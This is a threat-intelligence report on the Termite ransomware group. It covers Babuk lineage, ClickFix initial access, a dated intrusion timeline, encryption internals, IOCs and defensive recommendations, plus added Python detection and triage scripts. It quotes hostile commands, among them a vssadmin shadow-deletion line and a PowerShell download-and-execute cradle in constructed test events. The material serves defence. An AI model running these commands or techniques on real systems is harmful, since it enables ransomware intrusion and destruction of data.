
1. Executive Summary
Termite is a highly sophisticated ransomware operation first observed in November 2024. Built on the leaked Babuk ransomware source code, Termite has evolved rapidly from opportunistic CVE exploitation into a mature, multi-stage threat employing social engineering, purpose-built remote access tooling, and double extortion. As of March 2026, the group has claimed at least 35 known victims across healthcare, government, logistics, chemicals, and financial services spanning North America, Europe, and Australia.
The group’s most significant recent development is the adoption of ClickFix — a browser-based social engineering technique that bypasses traditional email phishing defenses entirely, making Termite one of the first ransomware operations to operationalize this attack class at scale.
2. Origins & Attribution
2.1 Codebase Lineage
Termite is assessed to be a derivative of Babuk ransomware, a strain whose full source code was publicly leaked in 2021. The inheritance is evident across encryption logic, service-termination lists, and core system interaction patterns. A distinctive forensic artifact supports the lineage: every file encrypted by Termite carries the following signature string appended at its end:
"choung dong looks like hot dog"
This string, inherited directly from the Babuk codebase, serves as a reliable indicator of compromise during forensic triage. Despite the shared lineage, Termite distinguishes itself through a more sophisticated multi-stage intrusion methodology and the integration of bespoke tooling absent from the original Babuk codebase.
2.2 Threat Actor: Velvet Tempest (DEV-0504)
Recent campaigns have been attributed to a threat actor tracked as Velvet Tempest, also designated DEV-0504 by Microsoft. This group is a long-standing ransomware affiliate with documented prior associations with Ryuk, REvil, Conti, BlackCat/ALPHV, and LockBit. Their migration to the Termite payload represents a continuation of their ransomware-as-a-service affiliate model, with the group bringing years of operational tradecraft to bear on behalf of Termite operators.
3. Initial Access Vectors — A Three-Phase Evolution
Termite has demonstrated a significant and deliberate evolution in initial access methodology, shifting from passive vulnerability exploitation toward sophisticated human-centric attacks.
Phase 1: CVE Exploitation (November–December 2024)
The group’s earliest documented campaigns exploited critical vulnerabilities in Cleo MFT (Managed File Transfer) software — a platform used by over 4,200 businesses globally, including major brands like New Balance, Barilla America, and TaylorMade.
The two key CVEs exploited were CVE-2024-50623 and CVE-2024-55956, both unauthenticated remote code execution flaws affecting Cleo Harmony, VLTrader, and LexiCom. Cleo patched CVE-2024-50623 in October 2024 (version 5.8.0.21), but researchers subsequently discovered that fully updated systems on 5.8.0.21 remained exploitable because the fix could be bypassed; the bypass was assigned CVE-2024-55956 and addressed in 5.8.0.24. The incomplete patch dramatically widened the victim pool. Attacks began on December 3, 2024, with Huntress Labs confirming at least 10 victims across consumer products, trucking, shipping, and food services within days.
Phase 2: Credential Theft (January–February 2025)
Campaigns in early 2025 pivoted toward credential harvesting as a ransomware precursor. Kroll investigators documented a watering-hole attack that used malvertising to deliver RedLine Stealer, a commercial credential harvester, to targeted users. The harvested credentials were subsequently used to gain access to VMware ESXi environments and deploy Termite directly on the hypervisors, a platform that typically lacks endpoint agent coverage.
Phase 3: ClickFix Social Engineering (Mid-2025 to Present)
The most operationally significant development in Termite’s history is the adoption of the ClickFix technique. Unlike phishing emails or software exploits, ClickFix attacks succeed through direct user interaction, making them substantially harder to block with technical controls alone.
How ClickFix works: Victims land on compromised websites displaying fake browser error notifications — typically mimicking a “Chrome update failed” message or a CAPTCHA verification screen. The page instructs the user to copy a displayed command and execute it by pressing Win+R (Windows Run dialog) and pasting it in. This single action — appearing harmless to an untrained user — executes a malicious PowerShell command that initiates the full attack chain. No email attachment, no exploit, no vulnerability required.
4. Detailed Intrusion Anatomy
The following reconstructs a documented February 2026 intrusion observed by MalBeacon researchers against a replica environment of a US non-profit organization with over 3,000 endpoints. It represents the clearest published window into Termite’s current operational tempo.
17:38:57 — ClickFix execution triggered via Windows Run dialog, downloading initial payload through finger.h3securecloud[.]com using the finger.exe utility (LOLBIN abuse, TCP/79).
17:39:14 — Archive extracted using the native tar.exe binary — no third-party tools introduced, reducing forensic footprint.
17:40:23 — Outbound request to ip-api[.]com to geolocate the compromised host and profile the target environment before proceeding.
17:40:30 — CastleRAT establishes its first C2 beacon to nachalonachalo[.]com, giving operators remote access to the environment.
17:45:03 — DonutLoader retrieved via a PowerShell IEX (Invoke-Expression) cradle from vrstudio[.]life — a fileless staging technique leaving no loader binary on disk.
17:45:25 — A .NET payload compiled on the host itself via csc.exe (the Microsoft C# compiler), evading signature-based detection of pre-compiled binaries.
17:59:45 — Active Directory enumeration begins via encoded PowerShell — mapping the domain, identifying privileged accounts, and locating high-value targets before the ransomware payload is ever deployed.
The Termite ransomware payload was not deployed within the 12-day observation window, but the sequence is textbook pre-ransomware staging behavior. The gap between intrusion and encryption is consistent with the group’s documented pattern of extended dwell time and thorough pre-encryption reconnaissance.
CastleRAT & Dead-Drop C2
CastleRAT is a purpose-built remote access tool deployed by Velvet Tempest operators. Its C2 infrastructure employs a notable evasion technique: legitimate Steam Community profile pages are used as dead-drop resolvers. Malicious C2 server addresses are encoded within Steam profile fields, and CastleRAT retrieves the real C2 address by reading these pages on startup. Since Steam is a trusted consumer platform rarely blocked at enterprise network perimeters, this technique allows C2 traffic to blend into normal web activity.
Full Malware Arsenal
Through ClickFix campaigns, Termite-affiliated operators deploy a broad malware ecosystem across their intrusions, creating multiple independent pathways for persistent access:
Stealers: LummaStealer (primary), RedLine Stealer — used to harvest credentials and browser session cookies before encryption.
RATs & Backdoors: CastleRAT, AsyncRAT, Xworm, NetSupport, SectopRAT — providing persistent remote access and command execution throughout the dwell period.
Loaders: DonutLoader, Latrodectus, MintsLoader — used to stage and deploy subsequent payloads while minimizing on-disk artifacts.
Ransomware: Termite payload — the final stage, deployed only after reconnaissance and exfiltration are complete.
5. Technical Ransomware Analysis
5.1 Pre-Encryption Behavior
Process Priority Manipulation: Upon execution, the ransomware calls SetProcessShutdownParameters(0, 0), ensuring its process is among the last to be terminated during any system shutdown — maximizing the encryption window if a user or administrator attempts an emergency reboot.
Mutex Check: Before beginning local drive encryption, Termite checks for the existence of a hardcoded mutex: "DoYouWantToHaveSexWithCuongDong". If not found, the ransomware proceeds to recursively traverse all local drives. The mutex prevents multiple simultaneous executions of the ransomware on the same host.
System Fingerprinting: The ransomware retrieves the system’s GUID and enumerates running services and processes via Windows API calls, building a profile of the environment to guide subsequent actions.
5.2 Defense Evasion
Volume Shadow Copy Deletion (T1490): The first major action Termite takes is the elimination of all Windows Volume Shadow Copies — the built-in recovery mechanism most organizations rely on for fast restoration:
vssadmin.exe delete shadows /all /quiet
Security Service Termination (T1489): Using ControlService() with SERVICE_CONTROL_STOP, Termite stops a comprehensive list of security and backup services before encrypting. Targeted categories include virtualization services (HvHost, vmcompute, vmms), backup solutions (all Veeam services, all BackupExec agents and engines, Acronis), security products (Sophos, DefWatch, ccEvtMgr, RTVscan), database services (sql, mepocs), and cloud backup agents (YooBackup, YooIT, CAARCUpdateSvc).
Process Termination (T1562.001): Termite terminates processes that may hold file locks preventing encryption. This includes database engines (sqlservr.exe, oracle.exe, dbeng50.exe), the full Microsoft Office suite (excel.exe, winword.exe, outlook.exe, powerpnt.exe, onenote.exe, visio.exe), email clients (thunderbird.exe, thebat.exe), and virtualization processes (vmmem.exe, vmwp.exe).
5.3 Encryption Engine (T1486)
Termite’s encryption engine supports runtime parameters for targeted or scoped execution: --onefile to encrypt a specific file, --shares to target a named network share, --paths to target a specific remote drive, and --debug to generate diagnostic logs.
Network Share Enumeration: Termite uses WNetOpenEnumW() and WNetEnumResourceW() to discover and enumerate all accessible network shares and mapped drives visible to the compromised host. It specifically targets the ADMIN$ hidden administrative share, which maps to the Windows system directory (%SystemRoot%) on remote hosts, to maximize spread. When the --shares argument is passed, NetShareEnum() is invoked to locate the ADMIN$ share and begin recursive encryption.
Remote Drive Targeting: GetDriveTypeW() is called against each discovered drive path. Drives identified as remote (SMB/NFS shares, mapped network drives) are fully enumerated and queued for encryption, allowing a single Termite execution to spread the encryption process across the entire connected network.
Local Drive Mounting: For protected or difficult-to-access local volumes, Termite employs SetVolumeMountPoint() to mount them to accessible paths before encrypting, ensuring no local storage escapes the sweep.
5.4 Post-Encryption Artifacts
After encryption completes, each affected file carries the .termite extension. A ransom note titled "How To Restore Your Files.txt" is dropped in every encrypted directory, directing victims to a Tor-based onion portal with a unique victim support token. The forensic signature "choung dong looks like hot dog" is appended to the binary tail of every encrypted file.
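The on-disk artifacts described in 2.1 and 5.4 (the .termite extension, the ransom note, and the Babuk-inherited tail marker) are easy to triage mechanically. The following Python scanner is an added example, not code from the report: it reads only the tail of each file, buckets hits so that partially renamed or tampered files show up separately, and runs against constructed sample files in a temporary directory. The 4096-byte tail window is an assumption, since the report only states that the string is appended at the end of the file.

```python
"""Triage scanner for the on-disk artifacts described in sections 2.1 and 5.4.

Added example, not code from the report. It checks the .termite extension, the
"How To Restore Your Files.txt" ransom note, and the Babuk-inherited marker string
appended to the tail of encrypted files. Sample files are constructed in a
temporary directory so the script runs offline.
"""
import os
import tempfile
from dataclasses import dataclass
from pathlib import Path

TERMITE_EXT = ".termite"
RANSOM_NOTE = "How To Restore Your Files.txt"
TAIL_MARKER = b"choung dong looks like hot dog"
# The report only says the string is appended at the end; assume it may be followed by
# other footer bytes, so search a window at the tail rather than the exact last 30 bytes.
TAIL_WINDOW = 4096


@dataclass(frozen=True)
class Finding:
    path: str
    has_extension: bool
    has_marker: bool


def read_tail(path, window=TAIL_WINDOW):
    """Return the last `window` bytes of a file without reading the whole file."""
    size = os.path.getsize(path)
    with open(path, "rb") as fh:
        fh.seek(max(0, size - window))
        return fh.read()


def inspect_file(path):
    p = Path(path)
    return Finding(
        path=str(p),
        has_extension=p.suffix.lower() == TERMITE_EXT,
        has_marker=TAIL_MARKER in read_tail(p),
    )


def scan_tree(root):
    """Walk `root`; return (findings that hit either indicator, ransom note paths)."""
    findings, notes = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if name == RANSOM_NOTE:
                notes.append(full)
                continue
            f = inspect_file(full)
            if f.has_extension or f.has_marker:
                findings.append(f)
    return findings, notes


def summarize(findings, notes):
    """Bucket results so an analyst sees partial or tampered artifacts separately."""
    return {
        "encrypted": sum(1 for f in findings if f.has_extension and f.has_marker),
        "marker_only": sum(1 for f in findings if f.has_marker and not f.has_extension),
        "extension_only": sum(1 for f in findings if f.has_extension and not f.has_marker),
        "ransom_notes": len(notes),
    }


def build_sample_tree(root):
    """Constructed sample files (not victim data) covering the cases above."""
    d = Path(root) / "finance"
    d.mkdir(parents=True, exist_ok=True)
    # Fully encrypted file: renamed and carrying the marker at the very end
    (d / "budget.xlsx.termite").write_bytes(b"\xab" * 512 + TAIL_MARKER)
    # Marker followed by further footer bytes, still inside the tail window
    (d / "report.pdf.termite").write_bytes(b"\xcd" * 2048 + TAIL_MARKER + b"\x00" * 64)
    # Renamed but no marker: a constructed partial case
    (d / "notes.docx.termite").write_bytes(b"\xef" * 256)
    # Marker present but extension removed (e.g. a user renamed the file back)
    (d / "ledger.csv").write_bytes(b"\x01" * 1024 + TAIL_MARKER)
    (d / "clean.txt").write_bytes(b"nothing to see here")
    (d / RANSOM_NOTE).write_text("constructed placeholder note")


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return summarize(*scan_tree(tmp))


if __name__ == "__main__":
    print(demo())
```

Point scan_tree() at a mounted forensic image or a file share to get a quick count of encrypted files and note locations before full imaging; the marker check catches files whose extension was stripped, and the extension-only bucket flags files that need closer inspection rather than an assumed encryption state.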
6. Double Extortion
Termite consistently combines file encryption with prior data exfiltration, creating a two-vector pressure campaign. Victims with robust backups still face the threat of sensitive data being published on Termite’s public leak site. The staged model proceeds as follows: data is exfiltrated silently during the dwell period; files are then encrypted causing operational disruption; the victim is directed to the Tor portal with a ransom demand; if unpaid, the stolen data is published publicly — creating regulatory, legal, and reputational consequences entirely independent of whether the victim can restore from backup.
7. Notable Confirmed Incidents
Blue Yonder (November 2024): Blue Yonder, a supply chain software vendor serving over 3,000 global enterprises, was breached in November 2024. The attack disrupted downstream services for dozens of customers and resulted in approximately 680 GB of data being exfiltrated — a textbook supply chain multiplier attack.
Cleo MFT Customers (December 2024): Beginning December 3, 2024, at least 10 organizations across consumer products, trucking, shipping, and food services were breached via the Cleo CVEs. The impact was compounded by the failed patch, which left even updated deployments exploitable.
Genea — Australian IVF Clinic (February 2025): One of Australia’s leading fertility services providers suffered a devastating breach resulting in approximately 940 GB of highly sensitive patient data being exfiltrated — including medical histories, fertility treatment records, and contact information. The nature of the data significantly amplified patient harm beyond the operational disruption.
Zschimmer & Schwarz (January 2025): The specialty chemicals manufacturer, producing high-performance chemical auxiliaries for global textile, leather, and metalworking industries, was confirmed as a Termite victim in January 2025.
Insight Hospital & Medical Center, Chicago (September 2025): The breach was estimated to have occurred in September 2025 but only surfaced publicly in February 2026 — suggesting a dwell time of approximately five months before detection or disclosure.
US Federal Contractors & Healthcare (2025–2026): ClickFix-linked Termite campaigns specifically targeted US healthcare and government-adjacent organizations, with confirmed victims including a children’s hospital in North Carolina, Illinois-based DoD and Department of Energy contractors, and a Maryland federal accounting firm.
As of March 2026, ransomware tracking services record 35+ confirmed victims on Termite’s active leak site.
8. Indicators of Compromise
File System:
- Extension: .termite on all encrypted files
- Ransom note: How To Restore Your Files.txt in every encrypted directory
- Binary signature: "choung dong looks like hot dog" appended to encrypted files
- Mutex: DoYouWantToHaveSexWithCuongDong
Network:
- finger.h3securecloud[.]com: ClickFix initial payload download
- nachalonachalo[.]com: CastleRAT C2 server
- vrstudio[.]life: DonutLoader PowerShell IEX staging host
- ip-api[.]com: environment geolocation profiling (legitimate service, abused)
- Outbound TCP/79 (finger protocol) from workstations
- Requests to steamcommunity.com profile pages from non-gaming contexts
Behavioral:
- Windows Run dialog (explorer.exe parent) spawning PowerShell or cmd.exe
- finger.exe making outbound TCP/79 connections
- csc.exe invoked from user temp directories
- PowerShell using IEX + DownloadData or DownloadString
- vssadmin.exe executing delete shadows
- Chrome credential store accessed by non-browser processes
- WNetOpenEnumW/WNetEnumResourceW called from non-admin processes
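The behavioral indicators above, and the staging sequence in section 4, translate directly into process-creation detections. The following Python is an added example, not code from the report or from MalBeacon: it encodes four of the indicators as rules over Sysmon Event ID 1 style records and then groups hits per host, since several distinct rules firing on one workstation is the staging chain rather than isolated noise. The record shape is an assumption about the log source, and every event is constructed, with example.invalid standing in for the real staging domains.

```python
"""Behavioral detections from sections 4 and 8 over Sysmon-style process events.

Added example, not code from the report or from MalBeacon. Records follow Sysmon
Event ID 1 field names (an assumption about the log source); all events below are
constructed and use example.invalid in place of the real staging domains.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str
    current_directory: str = ""


@dataclass(frozen=True)
class Alert:
    rule: str
    severity: str
    host: str
    evidence: str


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
TEMP_PATH = re.compile(r"\\(?:temp|tmp)(?:\\|$)", re.I)
# Download cradle in either order: IEX(...DownloadString...) or (...DownloadString...) | IEX
_FETCH = r"(?:downloadstring|downloaddata|invoke-webrequest|iwr|invoke-restmethod|irm)"
_EXEC = r"(?:iex|invoke-expression)"
CRADLE = re.compile(rf"\b{_EXEC}\b.*\b{_FETCH}\b|\b{_FETCH}\b.*\b{_EXEC}\b", re.I)


def rule_run_dialog_shell(ev):
    """Win+R launches land under explorer.exe. explorer.exe also parents double-clicked
    scripts and shortcuts, so a download cradle in the command line drives severity."""
    if basename(ev.parent_image) == "explorer.exe" and basename(ev.image) in SHELLS:
        sev = "high" if CRADLE.search(ev.command_line) else "medium"
        return Alert("clickfix_run_dialog_shell", sev, ev.host, ev.command_line)
    return None


def rule_finger_lolbin(ev):
    """finger.exe has no routine business use on workstations (TCP/79 staging)."""
    if basename(ev.image) == "finger.exe":
        return Alert("finger_lolbin", "high", ev.host, ev.command_line)
    return None


def rule_csc_from_temp(ev):
    """On-host C# compilation from a temp directory. PowerShell's Add-Type also drives
    csc.exe under %TEMP%, so expect tuning for scripts that legitimately use it."""
    in_temp = TEMP_PATH.search(ev.current_directory) or TEMP_PATH.search(ev.command_line)
    if basename(ev.image) == "csc.exe" and in_temp:
        return Alert("csc_on_host_compile", "medium", ev.host, ev.command_line)
    return None


def rule_vss_delete(ev):
    """Shadow copy deletion is a near-universal pre-encryption step."""
    cl = ev.command_line.lower()
    if basename(ev.image) == "vssadmin.exe" and "delete" in cl and "shadows" in cl:
        return Alert("vss_shadow_delete", "critical", ev.host, ev.command_line)
    return None


RULES = (rule_run_dialog_shell, rule_finger_lolbin, rule_csc_from_temp, rule_vss_delete)


def evaluate(events):
    return [a for ev in events for rule in RULES if (a := rule(ev)) is not None]


def rules_per_host(alerts):
    """Distinct rules per host: several hits on one host is the staging chain."""
    out = {}
    for a in alerts:
        out.setdefault(a.host, set()).add(a.rule)
    return out


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed, not from the documented intrusion
    ProcEvent("WS-0417", r"C:\Windows\explorer.exe", PS,
              "powershell -w hidden -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/s')\""),
    ProcEvent("WS-0417", PS, r"C:\Windows\System32\finger.exe", "finger.exe x@example.invalid"),
    ProcEvent("WS-0417", PS, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'csc.exe /noconfig /fullpaths @"C:\Users\alice\AppData\Local\Temp\abc123.cmdline"',
              r"C:\Users\alice\AppData\Local\Temp"),
    ProcEvent("WS-0417", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\vssadmin.exe",
              "vssadmin.exe delete shadows /all /quiet"),
    # Benign: software deployment tool launching PowerShell, no alert expected
    ProcEvent("WS-0902", r"C:\Windows\CCM\CcmExec.exe", PS, r"powershell.exe -File C:\Windows\CCM\inventory.ps1"),
    # A user opening cmd.exe from Run: explorer-parented but no cradle, so medium
    ProcEvent("WS-0902", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe"),
]

if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(f"[{a.severity}] {a.rule} on {a.host}: {a.evidence}")
```

In production the same rules belong in the SIEM or EDR query language; the value of the per-host grouping is that the ClickFix shell, the finger.exe download, the csc.exe compile and the vssadmin call each have plausible benign look-alikes on their own, but a single host producing three or four of them is the section 4 timeline replaying.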
9. Defensive Recommendations
Patch and verify: Apply Cleo MFT patches and confirm efficacy through authenticated scanning — version number alone is insufficient given the bypass discovered in the October 2024 patch.
Alert on VSS deletion: vssadmin delete shadows from any process is a near-universal ransomware precursor with virtually no legitimate use at scale. This should trigger an immediate high-severity alert.
Block or monitor TCP/79 (finger): Outbound finger protocol connections from workstations are extremely rare legitimately and were the initial ClickFix staging mechanism in the documented February 2026 intrusion.
Hunt for user-pasted PowerShell execution: PowerShell launched from the Windows Run dialog or Explorer is strongly correlated with ClickFix. Alert on PowerShell parents other than typical enterprise deployment tools.
Flag on-host .NET compilation: csc.exe invoked from user temp directories outside development machines indicates staged loader framework activity consistent with DonutLoader deployment.
Protect backup infrastructure: Maintain offline, immutable backups. Termite explicitly enumerates and kills Veeam, BackupExec, and Acronis services before encrypting — online backups are not sufficient.
Restrict ADMIN$ shares: Disable unnecessary administrative shares on endpoints and restrict access to explicitly authorized management systems only.
Monitor and harden ESXi hosts: Termite has been deployed directly within VMware ESXi environments, where conventional endpoint agents cannot be installed. Compensate by forwarding ESXi logs to the SIEM and restricting SSH and management-interface access to authorized jump hosts.
Monitor Steam from enterprise networks: CastleRAT uses Steam Community profile pages as C2 dead-drop resolvers — Steam traffic from corporate workstations outside gaming companies warrants inspection.
User awareness targeting ClickFix specifically: Train users that no legitimate browser, website, or IT process will ever instruct them to open the Run dialog and paste a command. This specific pattern is the single most actionable user-facing indicator of a ClickFix attack.
10. Conclusion
Termite represents a meaningful maturation of the ransomware threat landscape. In under 18 months, the group has evolved from opportunistic CVE exploitation into a sophisticated multi-stage operation with purpose-built malware, advanced operational security, and strategic targeting of high-value sectors. The shift to ClickFix social engineering is the most significant development: it removes the vulnerability dependency from initial access entirely, making patching alone an insufficient defense.
With 35+ confirmed victims, active campaigns ongoing, a proven affiliate infrastructure, and a continuously expanding malware arsenal, Termite should be treated as a persistent and escalating threat requiring sustained defensive attention across patch management, endpoint detection, backup integrity, and security awareness programs.